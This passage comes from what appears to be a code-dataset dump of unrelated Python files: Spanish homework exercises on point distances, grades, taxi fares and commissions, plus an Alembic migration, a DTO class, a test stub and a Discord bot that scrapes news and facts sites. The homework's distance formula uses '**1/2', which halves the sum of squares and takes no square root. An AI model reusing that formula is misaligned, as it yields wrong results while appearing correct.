P2\"\nD2_3=((2-1)**2+(3-1)**2+(4-3)**2)**1/2\nD2_4=((2-0.5)**2+(3-0.5)**2+(4-2)**2)**1/2\nD2_5=((2-1)**2+(3-2)**2+(4-1)**2)**1/2\nD2_6=((2-1)**2+(3-0.5)**2+(4-1)**2)**1/2\nD2_7=((2-3)**2+(3-2)**2+(4-0.5)**2)**1/2\nD2_8=((2-3)**2+(3-1)**2+(4-2)**2)**1/2\nD2_9=((2-0)**2+(3-0)**2+(4-0)**2)**1/2\nD2_10=((2-2)**2+(3-0)**2+(4-0.5)**2)**1/2\n\n\"Con respecto al P3\"\nD3_4=((1-0.5)**2+(1-0.5)**2+(3-2)**2)**1/2\nD3_5=((1-1)**2+(1-2)**2+(3-1)**2)**1/2\nD3_6=((1-1)**2+(1-0.5)**2+(3-1)**2)**1/2\nD3_7=((1-3)**2+(1-2)**2+(3-0.5)**2)**1/2\nD3_8=((1-3)**2+(1-1)**2+(3-2)**2)**1/2\nD3_9=((1-0)**2+(1-0)**2+(3-0)**2)**1/2\nD3_10=((1-2)**2+(1-0)**2+(3-0.5)**2)**1/2\n\n\"Con respecto al P4\"\nD4_5=((0.5-1)**2+(0.5-2)**2+(2-1)**2)**1/2\nD4_6=((0.5-1)**2+(0.5-0.5)**2+(2-1)**2)**1/2\nD4_7=((0.5-3)**2+(0.5-2)**2+(2-0.5)**2)**1/2\nD4_8=((0.5-3)**2+(0.5-1)**2+(2-2)**2)**1/2\nD4_9=((0.5-0)**2+(0.5-0)**2+(2-0)**2)**1/2\nD4_10=((0.5-2)**2+(0.5-0)**2+(2-0.5)**2)**1/2\n\n\"Con respecto al P5\"\nD5_6=((1-1)**2+(2-0.5)**2+(1-1)**2)**1/2\nD5_7=((1-3)**2+(2-2)**2+(1-0.5)**2)**1/2\nD5_8=((1-3)**2+(2-1)**2+(1-2)**2)**1/2\nD5_9=((1-0)**2+(2-0)**2+(1-0)**2)**1/2\nD5_10=((1-2)**2+(2-0)**2+(1-0.5)**2)**1/2\n\n\"Con respecto al P6\"\nD6_7=((1-3)**2+(0.5-2)**2+(1-0.5)**2)**1/2\nD6_8=((1-3)**2+(0.5-1)**2+(1-2)**2)**1/2\nD6_9=((1-0)**2+(0.5-0)**2+(1-0)**2)**1/2\nD6_10=((1-2)**2+(0.5-0)**2+(1-0.5)**2)**1/2\n\n\"Con respecto al P7\"\nD7_8=((3-3)**2+(2-1)**2+(0.5-2)**2)**1/2\nD7_9=((3-0)**2+(2-0)**2+(0.5-0)**2)**1/2\nD7_10=((3-2)**2+(2-0)**2+(0.5-0.5)**2)**1/2\n\n\"Con respecto al P8\"\nD8_9=((3-0)**2+(1-0)**2+(2-0)**2)**1/2\nD8_10=((3-2)**2+(1-0)**2+(2-0.5)**2)**1/2\n\n\"Con respecto al P9\"\nD9_10=((0-2)**2+(0-0)**2+(0-0.5)**2)**1/2 # Para la distancia del punto 9-10 no es necesario una lista\n\n\"Listas de distancias asociadas a un punto\"\nlist_D1=[D1_2, D1_3, D1_4, D1_5, D1_6, D1_7, D1_8, D1_9, D1_10] \nlist_D2=[D2_3, D2_4, D2_5, D2_6, D2_7, D2_8, D2_9, D2_10]\nlist_D3=[D3_4,D3_5,D3_6,D3_7,D3_8,D3_9,D3_10]\nlist_D4=[D4_5,D4_6,D4_7,D4_8,D4_9,D4_10]\nlist_D5=[D5_6,D5_7,D5_8,D5_9,D5_10]\nlist_D6=[D6_7,D6_8,D6_9,D6_10]\nlist_D7=[D7_8,D7_9,D7_10]\nlist_D8=[D8_9,D8_10]\n\n# Valor minimo de cada lista de distancias y se guardan en una nueva lista\nlist_min=[min(list_D1),min(list_D2),min(list_D3),min(list_D4),min(list_D5),min(list_D6),min(list_D7),min(list_D8),D9_10]\nGeodesica=min(list_min) # Saca la distancia minima de las distancias mas bajas encontradas\n\n# Se busca los puntos que corresponden a esa distancia mínima\nif Geodesica==(min(list_D1)):\n if Geodesica==(D1_2):\n parCercano=\"P1-P2\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_3):\n parCercano=\"P1-P3\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_4):\n parCercano=\"P1-P4\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_5):\n parCercano=\"P1-P5\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_6):\n parCercano=\"P1-P6\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_7):\n parCercano=\"P1-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_8):\n parCercano=\"P1-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_9):\n parCercano=\"P1-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D1_10):\n parCercano=\"P1-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D2)):\n if Geodesica==(D2_3):\n parCercano=\"P2-P3\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_4):\n parCercano=\"P2-P4\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_5):\n parCercano=\"P2-P5\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_6):\n parCercano=\"P2-P6\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_7):\n parCercano=\"P2-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_8):\n parCercano=\"P2-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_9):\n parCercano=\"P2-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_10):\n parCercano=\"P2-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D3)):\n if Geodesica==(D3_4):\n parCercano=\"P3-P4\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_5):\n parCercano=\"P3-P5\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_6):\n parCercano=\"P3-P6\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_7):\n parCercano=\"P3-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_8):\n parCercano=\"P3-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_9):\n parCercano=\"P3-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_10):\n parCercano=\"P3-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D4)):\n if Geodesica==(D4_5):\n parCercano=\"P4-P5\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D4_6):\n parCercano=\"P4-P6\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D4_7):\n parCercano=\"P4-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D4_8):\n parCercano=\"P4-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D4_9):\n parCercano=\"P4-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D4_10):\n parCercano=\"P4-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D5)):\n if Geodesica==(D5_6):\n parCercano=\"P5-P6\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D5_7):\n parCercano=\"P5-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D5_8):\n parCercano=\"P5-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D5_9):\n parCercano=\"P5-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D5_10):\n parCercano=\"P5-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D6)):\n if Geodesica==(D6_7):\n parCercano=\"P6-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D6_8):\n parCercano=\"P6-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D6_9):\n parCercano=\"P6-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D6_10):\n parCercano=\"P6-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D7)):\n if Geodesica==(D7_8):\n parCercano=\"P7-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D7_9):\n parCercano=\"P7-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D7_10):\n parCercano=\"P7-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D8)):\n if Geodesica==(D8_9):\n parCercano=\"P8-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D8_10):\n parCercano=\"P8-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(D9_10):\n if Geodesica==(D9_10):\n parCercano=\"P9-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\nparCercano=parCercano\n\n\n#------------------------ EJERCICIO 3 --------------------------------\n\"\"\"\nLa calificación de informatica se encuentra en el intervalo [0,5] y se calcula tomando 5 notas, \ncon porcentajes de 10%, 20%, 15%, 20% y 35%. La materia se aprueba por encima de 3.0\nLos siguientes estudiantes tienen las primeras 4 calificaciones definidas.\ncod Nombre Nota1 Nota2 Nota3 Nota4 Nota 5\n01 Miguel Pineda 1.0 1.1 2.3 1.1 ?\n02 Maria Gonzalez 3.1 3.1 1.2 3.0 ?\n03 Jose Nuñez 5.0 4.0 2.5 5.0 ?\n04 Angelica Lozano 3.1 1.0 2.6 1.0 ?\n05 Camilo Suarez 3.2 4.0 1.1 3.0 ?\n06 Mariana Rosero 5.0 5.0 5.0 3.9 ?\n07 Esteban Quesada 3.4 4.0 2.6 3.2 ?\n08 Julia Quintero 2.0 2.2 2.1 4.2 ?\n09 Mauricio Lizcano 3.7 4.1 4.7 4.0 ?\n10 Angie Gomez 4.1 4.7 4.4 5.0 ?\n11 Camilo Restrepo 5.0 5.0 1.0 3.2 ?\n12 Mauricio Velazquez 5.0 4.2 2.1 5.0 ?\n13 Esteban Rodriguez 3.2 4.1 2.2 3.3 ?\n Determine cuantos estudiantes pierden aúnque obtengan la mejor nota_5\n Determine cuantos estudiantes ganan aunque obtengan la peor nota_5\n Determine cuantos estudiantes tienen posibilidades de pasar\n Almacene sus resultados en una lista llamada estudiantes, tal como se muestra:\n estudiantes = [Cantidad_que_pierden, Cantidad_que_ganan, Cantidad_con_posibilidades]\n\"\"\"\n\nprint(\"\\n----- EJERCICIO 3 -----\")\n\n# Calcula la nota que lleva el alumno, sin contar la Nota 5\nStud_01=(1*0.10)+(1.1*0.20)+(2.3*0.15)+(1.1*0.20)\nStud_02=(3.1*0.10)+(3.1*0.20)+(1.2*0.15)+(3*0.20)\nStud_03=(5*0.10)+(4*0.20)+(2.5*0.15)+(5*0.20)\nStud_04=(3.1*0.10)+(1*0.20)+(2.6*0.15)+(1*0.20)\nStud_05=(3.2*0.10)+(4*0.20)+(1.1*0.15)+(3*0.20)\nStud_06=(5*0.10)+(5*0.20)+(5*0.15)+(3.9*0.20)\nStud_07=(3.4*0.10)+(4*0.20)+(2.6*0.15)+(3.2*0.20)\nStud_08=(2*0.10)+(2.2*0.20)+(2.1*0.15)+(4.2*0.20)\nStud_09=(3.7*0.10)+(4.1*0.20)+(4.7*0.15)+(4*0.20)\nStud_10=(4.1*0.10)+(4.7*0.20)+(4.4*0.15)+(5*0.20)\nStud_11=(5*0.10)+(5*0.20)+(1*0.15)+(3.2*0.20)\nStud_12=(5*0.10)+(4.2*0.20)+(2.1*0.15)+(5*0.20)\nStud_13=(3.2*0.10)+(4.1*0.20)+(2.2*0.15)+(3.3*0.20)\n\n\"Esta es la mejor nota 5\"\nnota_5=5*0.35 \n\n# 1-1. Compara la nota final con la mejor nota 5 y si es verdadero, el alumno pierde la materia\nB_nota_5_Stud_01 = Stud_01+nota_5 < 3\nB_nota_5_Stud_02 = Stud_02+nota_5 < 3\nB_nota_5_Stud_03 = Stud_03+nota_5 < 3\nB_nota_5_Stud_04 = Stud_04+nota_5 < 3\nB_nota_5_Stud_05 = Stud_05+nota_5 < 3\nB_nota_5_Stud_06 = Stud_06+nota_5 < 3\nB_nota_5_Stud_07 = Stud_07+nota_5 < 3\nB_nota_5_Stud_08 = Stud_08+nota_5 < 3\nB_nota_5_Stud_09 = Stud_09+nota_5 < 3\nB_nota_5_Stud_10 = Stud_10+nota_5 < 3\nB_nota_5_Stud_11 = Stud_11+nota_5 < 3\nB_nota_5_Stud_12 = Stud_12+nota_5 < 3\nB_nota_5_Stud_13 = Stud_13+nota_5 < 3\n\n# 1-2. Para la condicion 1 si la nota final del alumno es verdad entonces pierde.\npierde=0 # Contador de los que pierden\nif B_nota_5_Stud_01==True:\n pierde=1+pierde\nif B_nota_5_Stud_02==True:\n pierde=1+pierde\nif B_nota_5_Stud_03==True:\n pierde=1+pierde\nif B_nota_5_Stud_04==True:\n pierde=1+pierde\nif B_nota_5_Stud_05==True:\n pierde=1+pierde\nif B_nota_5_Stud_06==True:\n pierde=1+pierde\nif B_nota_5_Stud_07==True:\n pierde=1+pierde\nif B_nota_5_Stud_08==True:\n pierde=1+pierde\nif B_nota_5_Stud_09==True:\n pierde=1+pierde\nif B_nota_5_Stud_10==True:\n pierde=1+pierde\nif B_nota_5_Stud_11==True:\n pierde=1+pierde\nif B_nota_5_Stud_12==True:\n pierde=1+pierde\nif B_nota_5_Stud_13==True:\n pierde=1+pierde\nCantidad_que_pierden=pierde\n\n# 2-1. Verifica quienes ganan la materia con la peor nota 5\nP_nota5_Stud_01 = Stud_01 >=3\nP_nota5_Stud_02 = Stud_02 >=3\nP_nota5_Stud_03 = Stud_03 >=3\nP_nota5_Stud_04 = Stud_04 >=3\nP_nota5_Stud_05 = Stud_05 >=3\nP_nota5_Stud_06 = Stud_06 >=3\nP_nota5_Stud_07 = Stud_07 >=3\nP_nota5_Stud_08 = Stud_08 >=3\nP_nota5_Stud_09 = Stud_09 >=3\nP_nota5_Stud_10 = Stud_10 >=3\nP_nota5_Stud_11 = Stud_11 >=3\nP_nota5_Stud_12 = Stud_12 >=3\nP_nota5_Stud_13 = Stud_13 >=3\n\n# 2-2. Para la condicion 2, si la nota final del alumno es verdadera, entonces gana la materia con la peor nota 5\nganan=0 # Contador de los que ganan\n\nif P_nota5_Stud_01==True:\n ganan=1+ganan\nif P_nota5_Stud_02==True:\n ganan=1+ganan\nif P_nota5_Stud_03==True:\n ganan=1+ganan\nif P_nota5_Stud_04==True:\n ganan=1+ganan\nif P_nota5_Stud_05==True:\n ganan=1+ganan\nif P_nota5_Stud_06==True:\n ganan=1+ganan\nif P_nota5_Stud_07==True:\n ganan=1+ganan\nif P_nota5_Stud_08==True:\n ganan=1+ganan\nif P_nota5_Stud_09==True:\n ganan=1+ganan\nif P_nota5_Stud_10==True:\n ganan=1+ganan\nif P_nota5_Stud_11==True:\n ganan=1+ganan\nif P_nota5_Stud_12==True:\n ganan=1+ganan\nif P_nota5_Stud_13==True:\n ganan=1+ganan\nCantidad_que_ganan=ganan\n\n# 3. Cuenta los demás estudiantes, es decir que tienen posibilidades\nCantidad_con_posibilidades=13-Cantidad_que_pierden-Cantidad_que_ganan\n\n# 4. Almacen de los resultados\nestudiantes=[Cantidad_que_pierden,Cantidad_que_ganan,Cantidad_con_posibilidades]\nprint(\"[pierden,ganan,posibilidades]\")\nprint(estudiantes)\n\n\n#------------------------ EJERCICIO 4 --------------------------------\n\n\"\"\" Seis compañeros, contratan un taxi con el objeto de movilizarse juntos a la universidad. \nEl contrato es de lunes a viernes, y deben pagar al taxista $15000 por cada trayecto. \nSe prestarán dos servicios al día, uno de ida y el otro de regreso.\nSin embargo, los seis no se movilizan juntos todos los dias. Por tanto, han planteado que la tarifa\ndebe dividirse entre el numero de compañeros que se movilicen en cada trayecto.En caso, de que ninguno\nutilice el servicio. Deben pagar al taxista una tarifa de $10000, repartidos equitativamente entre todos.\nA continueación veamos el uso del servicio por parte de los compañeros en la última semana de clases:\n IDA | REGRESO\n LUNES MARTES MIERCOLES JUEVES VIERNES | LUNES MARTES MIERCOLES JUEVES VIERNES\nJUAN Si Si Si Si No | Si Si Si No No\nCAMILA Si No Si No Si | Si No No No No\nJOSE Si No Si Si No | Si No Si Si No\nMARIA Si Si Si No No | No No Si No No\nESTEBAN Si No No Si Si | No No No Si No\nANGIE Si No Si No No | Si No Si No No\n¿Cuanto debe pagar cada estudiante? \nAlmacene el resultado dentro de un diccionario llamado \"diccionarioPagos\"\nlas claves deben ser los nombres de los estudiantes (en strings)\ny los valores deben ser el dinero total que pagó cada uno al terminar la semana (en flotantes)\n\"\"\"\n\nprint(\"\\n----- EJERCICIO 4 -----\")\n\n\"Precio del taxi\"\nPay=15000\n\n# Calcula el precio del taxi por su uso\n\"Ida\"\nMon_Ida= Pay/6\nTue_Ida= Pay/2\nWed_Ida= Pay/5\nThu_Ida= Pay/3\nFri_Ida= Pay/2\n\"Regreso\"\nMon_Back= Pay/4\nTue_Back= Pay\nWed_Back= Pay/4\nThu_Back= Pay/2\nFri_Back= 10000/6\n\n# 1. A cada uno le calculamos lo que pagaron en la semana.\nJuan = Mon_Ida + Mon_Back + Tue_Ida + Tue_Back + Wed_Ida + Wed_Back + Thu_Ida + Fri_Back\nCamila = Mon_Ida + Mon_Back + Wed_Ida + Fri_Ida + Fri_Back\nJose = Mon_Ida + Mon_Back + Wed_Ida + Wed_Back + Thu_Ida + Thu_Back + Fri_Back\nMaria = Mon_Ida + Tue_Ida + Wed_Ida + Wed_Back + Fri_Back\nEsteban = Mon_Ida + Thu_Ida + Thu_Back + Fri_Ida + Fri_Back\nAngie = Mon_Ida + Mon_Back + Wed_Ida + Wed_Back + Fri_Back\n\n# 2. Pago semanal en el diccionario pedido\ndiccionarioPagos={\"Angie\": Angie, \"Camila\": Camila, \"Esteban\": Esteban, \"Jose\": Jose, \"Juan\": Juan, \"Maria\": Maria}\nprint(diccionarioPagos)\n\n\n#------------------------ EJERCICIO 5 --------------------------------\n\n\"\"\" El salario mensual de un empleado se calcula solo teniendo en cuenta el numero de seguros vendidos,\n (el precio de cada seguro es de $120000)\n Para los primeros 20 seguros vendidos, la comisión es del 20%.\n Para los siguientes 100 seguros las comisión es del 30%.\n Para los siguientes seguros vendidos. La comisión es de 10%.\n El salario de 4 empleados es el siguiente:\n Empleado empleado1 empleado2 empleado3 empleado4\n Salario $ 7860000 $ 5520000 $ 3720000 $ 2280000\n Determine el numero de seguros vendidos por cada empleado.\n Almacene su respuesta en una lista llamada cantidadSegurosVendidos como muestra el ejemplo:\n cantidadSegurosVendidos = [10, 50, 80, 32]\n \"\"\"\n\nprint(\"\\n----- EJERCICIO 5 -----\")\n\n#Salario de los empleados\nempleado_1=7860000\nempleado_2=5520000\nempleado_3=3720000\nempleado_4=2280000\n\nSeg1=20*120000 # salario que se gana por vender 20 seguros\nSeg2=100*120000 # salario que se gana por vender otros 100 seguros\n\ncomi1=Seg1*0.20\ncomi2=Seg2*0.30\n\n# Si la condicion se cumple se da por seguro que vendio mas de 120 seguros y solo hay que hallar la cantidad de seguros restantes\n\n# Para el empleado 1\nif empleado_1 > (comi1 + comi2):\n empleado_1= empleado_1 - (comi1 + comi2)\n Seg_V1= 20 + 100 + (empleado_1/(0.10*120_000)) # Si el N° de seguros vendidos > 120\nelif (empleado_1 > comi1) and (empleado_1 <= comi1 + comi2): # Si no se asegura que vendio > 20\n empleado_1= empleado_1 - comi1\n Seg_V1= 20 + (empleado_1/(0.3*120000)) # N° de seguros vendidos <= 120 y > 20\nelse:\n Seg_V1= empleado_1/(0.2*120000) # N° de seguros vendidos < 20\n\n# Para el empleado 2\nif empleado_2 > (comi1+comi2):\n empleado_2= empleado_2 -(comi1 + comi2)\n Seg_V2=20+100+(empleado_2/(0.10*120_000)) \nelif (empleado_2 > comi1) and (empleado_2 <= comi1 + comi2): \n empleado_2= empleado_2 - comi1\n Seg_V2=20+(empleado_2/(0.3*120_000)) \nelse:\n Seg_V2= empleado_2/(0.2*120_000) \n\n# Para el empleado 3\nif empleado_3 > (comi1+comi2):\n empleado_3= empleado_3 - (comi1+comi2)\n Seg_V3= 20 + 100 + (empleado_3/(0.10*120_000)) \nelif (empleado_3 > comi1) and (empleado_3 <= comi1 + comi2): \n empleado_3= empleado_3 - comi1\n Seg_V3= 20 + (empleado_3/(0.3*120_000)) \nelse:\n Seg_V3= empleado_3/(0.2*120_000) \n\n# Para el empleado 4\nif empleado_4 > (comi1 + comi2):\n empleado_4= empleado_4-(comi1 + comi2)\n Seg_V4=20 + 100 + (empleado_4/(0.10*120_000)) \nelif (empleado_4 > comi1) and (empleado_4 <= comi1 + comi2): \n empleado_4= empleado_4 - comi1\n Seg_V4= 20 + (empleado_4/(0.3*120_000)) \nelse:\n Seg_V4= empleado_4/(0.2*120_000) \n\n# Un paso intermedio para asegurar que la cantidad de seguros sea entera\nSeg_V1= int(Seg_V1)\nSeg_V2= int(Seg_V2)\nSeg_V3= int(Seg_V3)\nSeg_V4= int(Seg_V4)\n\n# 1. Se guarda en una lista la cantidad de seguros vendidos por los empleados\ncantidadSegurosVendidos=[Seg_V1,Seg_V2,Seg_V3,Seg_V4]\nprint(\"Cantidad de seguros vendidos: [empleado 1, empleado 2, empleado 3, Empleado 4]\")\nprint(cantidadSegurosVendidos)\n\n\"Finish\"","repo_name":"gitCarlos09/Informatica_2","sub_path":"INFORMES/INFORME1/ejercicios1.py","file_name":"ejercicios1.py","file_ext":"py","file_size_in_byte":21639,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42776189827","text":"\"\"\"empty message\n\nRevision ID: 84a89fe0b190\nRevises: 2f006dc658c5\nCreate Date: 2019-09-16 17:17:58.659496\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '84a89fe0b190'\ndown_revision = '2f006dc658c5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('ticket', sa.Column('order_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'ticket', 'orders', ['order_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'ticket', type_='foreignkey')\n op.drop_column('ticket', 'order_id')\n # ### end Alembic commands ###\n","repo_name":"mq-5/ticketbox","sub_path":"migrations/versions/84a89fe0b190_.py","file_name":"84a89fe0b190_.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19482793875","text":"from dtos import UserDto, ProductDto\n\n\nclass OrderDto:\n def __init__(self, model: dict):\n self.id = str(model['_id'])\n self.user = UserDto(model['user']).get_dict()\n self.address = model['address']\n self.status = model['status']\n self.date = model['date']\n self.products = [{'product': ProductDto(i['product']).get_dict(), 'count': i['count']} for i in model['products']]\n\n def get_dict(self):\n return self.__dict__\n","repo_name":"iHelops/sabina-server","sub_path":"dtos/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71017693548","text":"#!/usr/bin/env python3\nimport torch\nfrom cyy_torch_toolbox.default_config import DefaultConfig\n\nfrom cyy_torch_algorithm.quantization.qat import QuantizationAwareTraining\n\n\ndef test_training():\n return\n trainer = DefaultConfig(\"CIFAR10\", \"densenet40\").create_trainer()\n trainer.hyper_parameter.set_epoch(1)\n trainer.hyper_parameter.set_learning_rate(0.01)\n qat = QuantizationAwareTraining()\n trainer.append_hook(qat)\n trainer.train()\n","repo_name":"cyyever/torch_algorithm","sub_path":"cyy_torch_algorithm/test/quantization/test_qat.py","file_name":"test_qat.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37290209213","text":"import discord\nimport random\nimport aiohttp\nimport bs4\nimport requests\nimport csv\nimport os.path\nimport pyowm\nfrom discord.ext import commands\n\n\ndescription = '''There are a number of utility commands being showcased here.'''\neolas = commands.Bot(command_prefix='?', description=description)\n\nhello_list = ['Yo', 'yo', 'Hey', 'hey', 'Salut', 'salut', 'Bonjour', 'bonjour']\nfoot_list = ['Neymar', 'neymar','Cavani', 'cavani', 'PSG', 'psg',\n 'Zidane', 'zidane', 'Real', 'real', 'Madrid', 'madrid'\n 'Barca', 'barca', 'OM', 'Deschamps', 'deschamps', 'Blaise',\n 'blaise']\n\n\n@eolas.event\nasync def on_member_join(member):\n server = member.server\n fmt = 'Bienvenue {0.mention} chez {1.name} !'\n await eolas.send_message(server, fmt.format(member, server))\n\n\n@eolas.event\nasync def on_ready():\n print('Logged in as')\n print(eolas.user.name)\n print(eolas.user.id)\n print('------')\n\n\n@eolas.event\nasync def on_message(message):\n if message.content in hello_list:\n await eolas.send_message(message.channel, \"Salut !\")\n if any(i in message.content for i in foot_list):\n await eolas.send_message(message.channel, 'https://media.giphy.com/media/hBO3iUfEtI2s0/giphy.gif')\n await eolas.send_message(message.channel, \"Non, pas de ça ici, s'il-vous-plaît.\")\n await eolas.process_commands(message)\n\n\n# ?news - Scrape a specific block on lemonde.fr and return the news from it.\n@eolas.command()\nasync def news():\n source = requests.get('http://www.lemonde.fr/').text\n soup = bs4.BeautifulSoup(source, 'lxml')\n bloc = soup.find('ul', class_='liste_horaire')\n for news_lm in bloc.find_all('li'):\n\n hours = news_lm.span.text\n print(hours)\n\n try:\n titles = news_lm.find('a').text\n except Exception as e:\n titles = None\n\n print(titles)\n\n try:\n links = news_lm.find('a')['href']\n lm_link = f'https://www.lemonde.fr/{links}'\n except Exception as e:\n lm_link = None\n\n print(lm_link)\n print()\n\n if lm_link is not None:\n await eolas.say(hours + \"\\n\" + lm_link)\n else:\n pass\n\n filename = 'PATH.csv'\n fileEmpty = os.stat(filename).st_size == 0\n\n with open(filename, 'a') as csv_file:\n headers = ['Hours', 'Titles', 'Links']\n\n csv_writer = csv.DictWriter(csv_file, fieldnames=headers,\n delimiter='\\t')\n if fileEmpty:\n csv_writer.writeheader() # file doesn't exist, write header\n csv_writer.writerow(\n {'Hours': hours, 'Titles': titles, 'Links': lm_link})\n\n csv_file.close() \n\n\n# ?facts - Scrape unkno.com and return the fact from it.\n@eolas.command()\nasync def facts():\n source = requests.get('http://unkno.com/').text\n soup = bs4.BeautifulSoup(source, 'lxml')\n # facts = soup.find('section', class_='body')\n fact = soup.find('div', id='content')\n print(fact.text)\n await eolas.say('Here is your fact: ' + '\\n' + fact.text) \n\n \n@eolas.command()\nasync def add(left: int, right: int):\n \"\"\"Adds two numbers together.\"\"\"\n await eolas.say(left + right)\n\n\n@eolas.command()\nasync def roll(dice: str):\n \"\"\"Rolls a dice in NdN format.\"\"\"\n try:\n rolls, limit = map(int, dice.split('d'))\n except Exception:\n await eolas.say('Format has to be in NdN!')\n return\n\n result = ', '.join(str(random.randint(1, limit)) for r in range(rolls))\n await eolas.say(result)\n\n\n@eolas.command(description='For when you wanna settle the score some other way')\nasync def choose(*choices: str):\n \"\"\"Chooses between multiple choices.\"\"\"\n await eolas.say(random.choice(choices))\n\n\n@eolas.command()\nasync def repeat(times : int, content='repeating...'):\n \"\"\"Repeats a message multiple times.\"\"\"\n for i in range(times):\n await eolas.say(content)\n\n\n@eolas.command()\nasync def joined(member : discord.Member):\n \"\"\"Says when a member joined.\"\"\"\n await eolas.say('{0.name} joined in {0.joined_at}'.format(member))\n\n\n@eolas.group(pass_context=True)\nasync def cool(ctx):\n \"\"\"Says if a user is cool.\n In reality this just checks if a subcommand is being invoked.\n \"\"\"\n if ctx.invoked_subcommand is None:\n await eolas.say('No, {0.subcommand_passed} is not cool'.format(ctx))\n\n\n# ?chess - Print a link of a randomly selected puzzle from Lichess.org\n@eolas.command()\nasync def chess():\n random_number = random.sample(range(1, 125000), 1)\n random_ID = (\"\".join(map(str, random_number)))\n puzzle_link = f'https://lichess.org/training/{(\"\".join(map(str, random_number)))}'\n print('Lichess Puzzle ID:' + '\\n' + random_ID + '\\n')\n await eolas.say('Lichess Puzzle:' + '\\n' + puzzle_link)\n\n\n# ?meteo - Print the forecast of a specific location.\n@eolas.command()\nasync def meteo(*, name):\n owm = pyowm.OWM('OWM_API_KEY', language='fr')\n\n 